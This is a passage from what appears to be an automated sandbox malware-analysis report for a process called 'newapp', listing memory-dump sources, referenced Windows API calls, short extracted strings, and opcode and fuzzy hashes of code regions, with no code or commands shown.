                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 754df56c66fcd90ac73c2a342ea4634bae8629554ed46c4b900e74a5fca07d1f
                                                                                                            • Instruction ID: c6ad12c507c033ad2bc42679fc16ad0eb5e4bb29725a498befc28c4501fcf023
                                                                                                            • Opcode Fuzzy Hash: 754df56c66fcd90ac73c2a342ea4634bae8629554ed46c4b900e74a5fca07d1f
                                                                                                            • Instruction Fuzzy Hash: C91120B5C00749CFCB10CF9AC448ADEFBF8EB88220F10846AD869B7610C374A585CFA5
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 069CBFED
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: 44122fff161a73177d7e805ccf166c6ef3af05a00cb25fee5faee0ba86e10084
                                                                                                            • Instruction ID: 45538d01f92b1a84485c1382b6996aef2c30d065c9d8ab801ff7752f14aab011
                                                                                                            • Opcode Fuzzy Hash: 44122fff161a73177d7e805ccf166c6ef3af05a00cb25fee5faee0ba86e10084
                                                                                                            • Instruction Fuzzy Hash: 6C1125B58002498FDB20DF9AD949BDEFFF8EB48220F10845AE458A7610C375A584CFA5
                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,069CBAA5), ref: 069CBB2F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2492992576-0
                                                                                                            • Opcode ID: 73cdf50909e5c6ce4444af7ebfdd568655deea85761fab79d2c37ce7b7f8e45d
                                                                                                            • Instruction ID: efb499cf1ec8c9864bdb69fe9895879e85c8ee3c28f447f42a0d28350aae32cd
                                                                                                            • Opcode Fuzzy Hash: 73cdf50909e5c6ce4444af7ebfdd568655deea85761fab79d2c37ce7b7f8e45d
                                                                                                            • Instruction Fuzzy Hash: 1E1103B58002498FCB10DF9AD985BDEFBF8EB48324F20841AD559A7650C778A984CFA5
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 069CBFED
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: 09694f47249d0c73f0619156bf81c91dbdad63fc11ba7c432366167354c75018
                                                                                                            • Instruction ID: 3c2c8f0c234735f9c493d68fd79df21126c9916ab12b5f84660c1ba718fc5e55
                                                                                                            • Opcode Fuzzy Hash: 09694f47249d0c73f0619156bf81c91dbdad63fc11ba7c432366167354c75018
                                                                                                            • Instruction Fuzzy Hash: B41100B59003488FDB20DF9AD449B9EFBF8EB48324F20845AE559A7710D378A944CFA5
                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,069CBAA5), ref: 069CBB2F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184060690.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69c0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2492992576-0
                                                                                                            • Opcode ID: cdf6bec89e7f28540cb50c78b1456be7f481faa735e1c5c1d0770c6e4976b3b4
                                                                                                            • Instruction ID: 808d9b66ae6c44ccc0d06913f23802c6b9bec18ba3d0bbef7c898e7a18cb41c3
                                                                                                            • Opcode Fuzzy Hash: cdf6bec89e7f28540cb50c78b1456be7f481faa735e1c5c1d0770c6e4976b3b4
                                                                                                            • Instruction Fuzzy Hash: C51130B1800348CFCB60DF9AC489BDEFBF8EB48324F20842AD559A7610C374A944CFA5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: 9d622f0170ba524deb70c993f1eeebcbd4f79a30cdb9ab63b1f8827287ee35d7
                                                                                                            • Instruction ID: 85672a863d4b68604bad01c93f3556331cd759530eed4369b43fb74d047d0e26
                                                                                                            • Opcode Fuzzy Hash: 9d622f0170ba524deb70c993f1eeebcbd4f79a30cdb9ab63b1f8827287ee35d7
                                                                                                            • Instruction Fuzzy Hash: 6B41B130E002199FDF51DF75C9446AEBBB6EF85300F24893AE406EB640DB70E94ACB91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: 7f20769a9643dec9bd6cc679aa85e6682c9f76f59674f2bbdf954c6a346d4ff6
                                                                                                            • Instruction ID: f6b374b35c9f956b34e43ddfcfb605a1d4bf29ee4f36eaa71b17345d831dfbbc
                                                                                                            • Opcode Fuzzy Hash: 7f20769a9643dec9bd6cc679aa85e6682c9f76f59674f2bbdf954c6a346d4ff6
                                                                                                            • Instruction Fuzzy Hash: 6A416030E002099FDF55DFB5C9546AEBBB6EF85300F208939D406E7640DB75E949CB91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: b99d621b16118505da26609be867f7ae558beb56363bd4c571dee2ae29c5cfff
                                                                                                            • Instruction ID: b0f8feb4e230b6beb0e2ed27e82bcfef10c846d75efe8446802c6be5d97190d7
                                                                                                            • Opcode Fuzzy Hash: b99d621b16118505da26609be867f7ae558beb56363bd4c571dee2ae29c5cfff
                                                                                                            • Instruction Fuzzy Hash: A4310431B002058FDB4A9B74C91476FBBE2AF89204F248538E506EB395DF35DE46CBA1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: 42bf04dfb5e3a4fcd41210a577361c09ed8394d9d318fea451dd14f61e0f5291
                                                                                                            • Instruction ID: 7c421b8f9332dbbf4b6f7e5642642af2906a094cb862fb86611a8bd04941590d
                                                                                                            • Opcode Fuzzy Hash: 42bf04dfb5e3a4fcd41210a577361c09ed8394d9d318fea451dd14f61e0f5291
                                                                                                            • Instruction Fuzzy Hash: 7B31F031B002058FDB49AB74D81476FBAE6AF89204F208438E506DB395DE35DE46CBA1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Ocq
                                                                                                            • API String ID: 0-2995510325
                                                                                                            • Opcode ID: b89292dc79744077ec2bd73c3b8c93b196d71d851b845922795773f3210d39e5
                                                                                                            • Instruction ID: c1ab551e1d08e70bf916a01879f0af4e82d9c1a7ea155d2cf77be88e5eae75fe
                                                                                                            • Opcode Fuzzy Hash: b89292dc79744077ec2bd73c3b8c93b196d71d851b845922795773f3210d39e5
                                                                                                            • Instruction Fuzzy Hash: BFF0DA30A50119DBDB14DF94E899BAEBBB2BF88701F208129E402A7694CB741D05DB80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5b0a5d4e9b118092e8c8f9d2163746b32e28158a306af5a6f021b2afd6b95abd
                                                                                                            • Instruction ID: ea06855f08220ba52d62e84a2a1cbbd28c8874b1b0bad5b72f627f79132be42a
                                                                                                            • Opcode Fuzzy Hash: 5b0a5d4e9b118092e8c8f9d2163746b32e28158a306af5a6f021b2afd6b95abd
                                                                                                            • Instruction Fuzzy Hash: CDA1B5B0F002099FDF64CA6CC990B6EB6EAEB89310F71C835E405E7799CA35DC819752
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1697fc43e2a1694ecb1fa91ac43ade605570deaf8db2bef1ea5eeb431aeb53a3
                                                                                                            • Instruction ID: 3b27b7867b99e296c97893929fac385b08230f21181aab87578f1cbb8a974e86
                                                                                                            • Opcode Fuzzy Hash: 1697fc43e2a1694ecb1fa91ac43ade605570deaf8db2bef1ea5eeb431aeb53a3
                                                                                                            • Instruction Fuzzy Hash: 0FA138B4E001098BDFA0CB58C480BADB7B9EB45314F65C936E419EBB49DB35DC82CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0eb80b31b0f7d7042115cf87193095007bcf0eb2f8bfa5852a01f203a2a085cb
                                                                                                            • Instruction ID: 379af0ce011cc1677b9728d73362b8e73a5846ea09fbf1790937f79370d55e15
                                                                                                            • Opcode Fuzzy Hash: 0eb80b31b0f7d7042115cf87193095007bcf0eb2f8bfa5852a01f203a2a085cb
                                                                                                            • Instruction Fuzzy Hash: 9761BF71F001114FCB509A7EC89466FEADBAFC5224F25843AE80EDB364DE65DD0287C6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d876c94e94c9082c3cdea79a6ae4ad65348bf055e3c3efb3bb3a4a3733eb8fcd
                                                                                                            • Instruction ID: bfe4d950f73748e0b634499a371469d50b89a8b86aecbf0ebc9a17b2aaf9078d
                                                                                                            • Opcode Fuzzy Hash: d876c94e94c9082c3cdea79a6ae4ad65348bf055e3c3efb3bb3a4a3733eb8fcd
                                                                                                            • Instruction Fuzzy Hash: D2814C30B002059FDF54DFA8D95476EB7F6AB89704F248539D40ADB794EA35DC828B81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: da8ff426ab468d1f5bc9c9f967ecb65e2302d716b10f9bbf0e6cfeaf7ff290b9
                                                                                                            • Instruction ID: 794f59f5fde60f6be1e62cb307aed2da18e0db85a04eb3f9f9ace46e83ba6e61
                                                                                                            • Opcode Fuzzy Hash: da8ff426ab468d1f5bc9c9f967ecb65e2302d716b10f9bbf0e6cfeaf7ff290b9
                                                                                                            • Instruction Fuzzy Hash: 07914E30E102198FDF60DF68C990B9DB7B1FF89700F20C5A9D549AB255DB70AA85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1fdd2e3688630b0d0627ec633d3bdf91963c95aa6cab84966345dd50514ad132
                                                                                                            • Instruction ID: 149530e8ed109256ea4b8df46019003cdde0462e47acd7fc3072830abe329bda
                                                                                                            • Opcode Fuzzy Hash: 1fdd2e3688630b0d0627ec633d3bdf91963c95aa6cab84966345dd50514ad132
                                                                                                            • Instruction Fuzzy Hash: 08814D30B002099FDF44DFA9D55476EB7F6AB89704F248539D40ADB784EB31EC428B41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f108a1e370466991a4dfeb2bd213d790f0ef1231c651b7703c57b8fd11d075c5
                                                                                                            • Instruction ID: 16210dac8e22d82b55ec4c7216a16c01bc12aa3acee95fe26ee1241d8f55ee38
                                                                                                            • Opcode Fuzzy Hash: f108a1e370466991a4dfeb2bd213d790f0ef1231c651b7703c57b8fd11d075c5
                                                                                                            • Instruction Fuzzy Hash: 1B914D30E102198BDF60DF68C980B9DB7B1FF89700F20C5A9D549BB355EB70AA858F91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 525179d25446e3990754f151036b4b9ff65d9203b4821244ebf7d9c1fb56100b
                                                                                                            • Instruction ID: addad98bace40663de15d5be74dda227d84f6087a3b740d2be39b5006cbe488c
                                                                                                            • Opcode Fuzzy Hash: 525179d25446e3990754f151036b4b9ff65d9203b4821244ebf7d9c1fb56100b
                                                                                                            • Instruction Fuzzy Hash: 2D711A70A002099FCB54DFA9D985A9DBBF6FF88304F24C529E40AEB755DB30E946CB50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 31fd08e534f20bf8bc6a38a94752a88b9edc854ce2720b589e8fff32686dd534
                                                                                                            • Instruction ID: 4a7bc1bf1492dd64f3621e9db75466d52b493f83bc64f888fdd4b5bcb89ffa11
                                                                                                            • Opcode Fuzzy Hash: 31fd08e534f20bf8bc6a38a94752a88b9edc854ce2720b589e8fff32686dd534
                                                                                                            • Instruction Fuzzy Hash: 73710970A002099FDB54DFA9D981A9DBBF6EF88304F24C539D40AEB755DB30ED468B50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e216c7bd7eb266ae63498e8384a4f2d540186415c6dfb0a92f1e86414304dd19
                                                                                                            • Instruction ID: 9b540fec11a8696a63953dfb9058628744c43cbf12712386c875046b4c5f6c6c
                                                                                                            • Opcode Fuzzy Hash: e216c7bd7eb266ae63498e8384a4f2d540186415c6dfb0a92f1e86414304dd19
                                                                                                            • Instruction Fuzzy Hash: 9551D031E00109DFDB64EB78E8466ADBBB6EF84315F20887AE10ADB651DB319C55CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2c10acf63e2698a50d18fa68de1965e92f76518de36a9962bbe843ed4975a3a4
                                                                                                            • Instruction ID: 556cadfc6be32f102718398988f579f9b851c3c360dc576649db28fbb3769556
                                                                                                            • Opcode Fuzzy Hash: 2c10acf63e2698a50d18fa68de1965e92f76518de36a9962bbe843ed4975a3a4
                                                                                                            • Instruction Fuzzy Hash: FA51E830B102149FEFA4667CD955B2F2A6ED789350F30893AE80BD77D5CA39CC858792
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9fdb2447c1186d7c39bf346d693437f7b5d557c04a02e8193cbce3da247c8834
                                                                                                            • Instruction ID: 06d849e1f6ac917fe0b72f19c25a159aaf50b16d4daca6e1608177b5ea264e19
                                                                                                            • Opcode Fuzzy Hash: 9fdb2447c1186d7c39bf346d693437f7b5d557c04a02e8193cbce3da247c8834
                                                                                                            • Instruction Fuzzy Hash: 0551C430B102149FEFA4667CD955B2F2A5ED789750F30893AE80BD7BE4CA79CC854392
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8a52a9d9b57bbed414300a87811a6f43278933286e8e83c3dbbf580378bfaa7a
                                                                                                            • Instruction ID: 0a2e504f21179e9cd12845ee5598e1912d29c7f1abaf527c414d5c92523292de
                                                                                                            • Opcode Fuzzy Hash: 8a52a9d9b57bbed414300a87811a6f43278933286e8e83c3dbbf580378bfaa7a
                                                                                                            • Instruction Fuzzy Hash: 64413071E006098FDF60CEA9D880AAFFBF6EB94314F21893AD156D7A54D730E9458B90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1f993599a758a3b14507b742ca6ad2a4871fdc7fa18dfdfc4006134cc78b9937
                                                                                                            • Instruction ID: 90461b4eaca5eecde426a9376c29e5df6f22235a035bd7f13ac14b8a1660eb16
                                                                                                            • Opcode Fuzzy Hash: 1f993599a758a3b14507b742ca6ad2a4871fdc7fa18dfdfc4006134cc78b9937
                                                                                                            • Instruction Fuzzy Hash: 4F310431B011199FDF14ABB8E8051AEBBB6EF84315F108879E50AD7640DF319865C791
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0bb109d49318fec6248cb3e46ef552a8a4505214851c57fdbf7fb532d6329403
                                                                                                            • Instruction ID: 02f5af13abae307b6194107dcf1633593220fd9f2d7838ae82b9f8ad7f9d4dd3
                                                                                                            • Opcode Fuzzy Hash: 0bb109d49318fec6248cb3e46ef552a8a4505214851c57fdbf7fb532d6329403
                                                                                                            • Instruction Fuzzy Hash: 1341B271E102059FDF618F68C48066EBBB5FB45320F77C876E459EBA51C234E941CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b5893b8a14dfe004260cb84e468e444be3fb8ae6bfbeb212bf7a3c1125b7f904
                                                                                                            • Instruction ID: 4918982b11c490d341838c917c15d2a7b543464f11a013ecd97d2f0d6c31e8e9
                                                                                                            • Opcode Fuzzy Hash: b5893b8a14dfe004260cb84e468e444be3fb8ae6bfbeb212bf7a3c1125b7f904
                                                                                                            • Instruction Fuzzy Hash: ED31A370E106059FCB15DF64D89569EBBB6AF89300F20C92DE916EB750DB319D42CB40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 523a0127531d6bc8d9c31ad0d31ea7c0e770be0951be58cb9281ef67c8bfc518
                                                                                                            • Instruction ID: 78740e7f3f683e586c76533fa5834c229d256619fc751b40d79e0dee571220f0
                                                                                                            • Opcode Fuzzy Hash: 523a0127531d6bc8d9c31ad0d31ea7c0e770be0951be58cb9281ef67c8bfc518
                                                                                                            • Instruction Fuzzy Hash: 8231C630E1070A9FDF15DF65C880A9EBBB6EF85314F108939E405E7754EB70A94A8B80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 85b2b3439f56f7ae53984b59d6f1a64ea66ba4cb1f3ff5575942397ebd725058
                                                                                                            • Instruction ID: d02475f85e8798a87eb85b32f6e10ea2aed3bad26149353d8110df04c542d8f1
                                                                                                            • Opcode Fuzzy Hash: 85b2b3439f56f7ae53984b59d6f1a64ea66ba4cb1f3ff5575942397ebd725058
                                                                                                            • Instruction Fuzzy Hash: 50317030E106099FCB15DF64D85469EBBB6AF89300F10C92DE916E7740DB71AD42CB50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9a94c505e90155475e7c8c1621c8e99f2fc409fd1b3fe76bbe0bbb8da8730286
                                                                                                            • Instruction ID: 52a6ae2ffb48aed9c7e86867c3bb6c30f5a2218b82a6ef4db12c84f1839de484
                                                                                                            • Opcode Fuzzy Hash: 9a94c505e90155475e7c8c1621c8e99f2fc409fd1b3fe76bbe0bbb8da8730286
                                                                                                            • Instruction Fuzzy Hash: AC216876F012059FDB40DF78E940BAEBBF5AB48640F14C425E949E7394E731D912CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_69d0000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1c20a5a453c4c1a41a542b19812930eaf0f84280f22c16aa043657479dd5c86e
                                                                                                            • Instruction ID: add95d9dac5368119b132f84a4b3bdf83aa144613939101a3f075010f742d084
                                                                                                            • Opcode Fuzzy Hash: 1c20a5a453c4c1a41a542b19812930eaf0f84280f22c16aa043657479dd5c86e
                                                                                                            • Instruction Fuzzy Hash: 31217A75F012159FEB40DF69D880AAEBBF6EB48750F20802AE909E7394E731DD11CB95
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4163650827.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f7d000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 496761b9745ffc562473e31d5300aab2ec522b5bdb62623ff1665b3c9cfc8837
                                                                                                            • Instruction ID: 7273ee98d4c19c2aa7febca455d52af9d7042092c9bcf61b93dc42187ccccc35
                                                                                                            • Opcode Fuzzy Hash: 496761b9745ffc562473e31d5300aab2ec522b5bdb62623ff1665b3c9cfc8837
                                                                                                            • Instruction Fuzzy Hash: 0A212E7150D3C09FD703CB24D994711BF71AF46224F29C5EBD8898F2A7C23A985ADB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4163650827.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_f7d000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dea33010c1d56897ab6c8f2d82db738208d39339be1d2fba8c7e0c6707f1b361
                                                                                                            • Instruction ID: 1c09f4adcc344dcbe8c60f4e96885e3e828868a9318e6a1c85c626ce8ac585a3
                                                                                                            • Opcode Fuzzy Hash: dea33010c1d56897ab6c8f2d82db738208d39339be1d2fba8c7e0c6707f1b361
                                                                                                            • Instruction Fuzzy Hash: 26212271504204DFCB10DF14D980B26BBB5FF84324F64C56AD80E4B29AC33AD846DA62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.4184224772.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
